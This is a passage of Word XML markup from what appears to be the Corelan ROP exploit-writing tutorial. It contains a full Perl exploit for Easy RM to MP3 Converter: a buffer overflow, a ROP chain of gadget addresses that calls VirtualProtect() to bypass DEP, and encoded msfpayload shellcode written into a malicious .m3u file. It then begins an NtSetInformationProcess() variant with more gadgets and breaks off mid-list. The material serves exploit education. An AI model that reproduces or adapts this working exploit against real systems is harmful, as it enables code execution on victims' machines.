        <w:t>What are my options to do this ?  How can I make ESP point at 0010F740 and then return (to the pointer to VirtualProtect()) ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Answer : EAX already points at this address. So if we can put eax into esp and then return, it should be fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Search rop.txt for a push eax / pop esp combination :</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 xml:space="preserve">0x73DF5CA8 # PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN   [Module : MFC42.DLL] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This one will work, but there are 2 POP instructions in the gadget. So we have to adjust EAX first (to compensate for the POP’s). We basically need to subtract 8 from eax first, before adjusting the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To do that, we can use</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0x775D12F1  #SUB EAX,4 # RET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Our final chain will look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x775D12F1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x775D12F1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x73DF5CA8 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Put everything together in the exploit script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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#------Put stack pointer in EDI &amp; EAX------------------------#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$rop=pack('V',0x5AD79277);  #PUSH ESP, POP EDI</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 = $rop.pack('V',0x77C1E842); #PUSH EDI, POP EAX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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate for POP EBP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#stack pointer is now in EAX &amp; EDI, now jump over parameters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$rop=$rop.pack('V',0x1001653D);  #ADD ESP,20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#-------Parameters for VirtualProtect()----------------------#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my $params=pack('V',0x7C801AD4);          #VirtualProtect()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WWWW</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #return address (param1)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XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #lpAddress      (param2)</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YYYY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">";   #Size           (param3)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 = $params."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>ZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";   #flNewProtect   (param4)</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$params = $params.pack('V',0x10035005);  #writeable address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$params=$params.("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 8);  #padding</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ADD ESP,20 + RET will land here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change ESI so it points to correct location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to write first parameter (return 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my $rop2= pack('V',0x763C982F);  # XCHG ESI,EDI # DEC ECX # RETN 4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#-----Make eax point at shellcode--------------------------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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding - compensate for RETN4 before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#padding</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#return address is in EAX - write parameter 1</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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#EAX now contains stack pointer</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#save it back to ESI first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$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN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#-----Make eax point at shellcode (again)--------------------------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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding</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#increase ESI with 4</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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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#and write lpAddress (param 2)</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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#save EAX in ESI again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$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN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#create size - set EAX to 300 or so</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$rop2=$rop2.pack('V',0x100307A9);  # XOR EAX,EAX # RETN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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding</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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding</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$rop2=$rop2.pack('V',0x1002DC4C);  #ADD EAX,100 # POP EBP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#padding</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#write size, first set ESI to right place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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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#write (param 3)</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$rop2=$rop2.pack('V',0x77E84115);</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xml:space="preserve">"; #padding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#save EAX in ESI again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$rop2=$rop2.pack('V',0x775D131E);  # PUSH EAX # POP ESI # RETN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#flNewProtect 0x40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$rop2=$rop2.pack('V',0x10010C77);   #XOR EAX,EAX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$rop2=$rop2.pack('V',0x1002DC41);   #ADD EAX,40 # POP EBP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#padding</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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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$rop2=$rop2.pack('V',0x77157D1D);  # INC ESI # RETN   [Module : OLEAUT32.dll]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#write (param4)</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$rop2=$rop2.pack('V',0x77E84115);</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"; #padding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#Return to VirtualProtect()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#EAX points at VirtualProtect pointer (just before parameters)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#compensate for the 2 POP instructions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$rop2=$rop2.pack('V',0x775D12F1);  #SUB EAX,4 # RET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$rop2=$rop2.pack('V',0x775D12F1);  #SUB EAX,4 # RET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#change ESP &amp; fly back</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$rop2=$rop2.pack('V',0x73DF5CA8);  #[Module : MFC42.DLL]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PUSH EAX # POP ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN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$nops = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 240;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./msfpayload windows/messagebox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TITLE=CORELAN TEXT="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop test by corelanc0d3r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" R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 ./msfencode -e x86/alpha_mixed -t perl</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my $shellcode =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\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a</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\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59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\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41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\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42</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\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51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\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49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\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46</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\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c</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\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45</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\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48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\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47</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\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48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\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47</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\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e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\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49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\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48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\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49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\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49</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\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e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\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a</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\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42</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\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44</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\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e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\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b</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\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51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\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43</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\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50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\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51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\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50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\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c</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\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48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\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e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\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b</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\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50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\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e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\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51</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\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50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\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43</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\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43</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\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50</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\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48</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\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46</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\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e</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\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w: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\x5a\x41\x41</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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 300;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$payload = $junk.$eip.$junk2.$rop.$params.$rop2.$nops.$shellcode.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($shellcode)."</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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3076575" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Image37" desc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a:hlinkClick r:id="rId113"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3076575" cy="1400175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="ropversion2"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr/>
        <w:t>Direct RET – ROP Version 2 – NtSetInformationProcess()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s use the same application/vulnerability again to test a different ROP bypass technique : NtSetInformationProcess()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function takes 5 parameters :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2170"/>
        <w:gridCol w:w="7468"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2170"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Return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7468" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Value to be generated, indicates where function needs to return to (= location where your shellcode is placed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2170"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NtCurrentProcess()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7468"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Static value, set to 0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2170"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ProcessExecuteFlags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7468"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Static value, set to 0x22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2170"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&amp;ExecuteFlags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7468"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Pointer to 0x00000002, may be a static address hardcoded in your sploit, but must be writeable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2170"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sizeOf(ExecuteFlags)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7468" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Static value, set to 0x4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The exploit rop layout will most likely look pretty much the same as with VirtualProtect() :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">save stack position </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">jump over the placeholders </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">generate the value for the return address </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">generate the value for the second parameter (0x22) and use "ESI+0x10" to write it onto the stack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">zero out eax : XOR EAX,EAX + RET : 0x100307A9  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ADD EAX,40 + RET : 0x1002DC41 + chain of pointers to ADD EAX,-2 until it contains 0x22 (0x10027D2E) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Alternatively, use ADD AL,10 (0x100308FD) twice and then INC EAX twice (0x1001152C) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">if required, generate value for the third parameter (pointer to 0x2, writable address).  Tip : try running "!pvefindaddr find 02000000 rw" in Immunity Debugger and see if you can find a static / writeable address. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">generate the value for the fourth parameter (0x4) and use "ESI+0x10" to write it onto the stack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="1414" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">inc eax 4 times : 0x1001152C </w:t>
      </w:r>
    </w:p>
    <w:p>
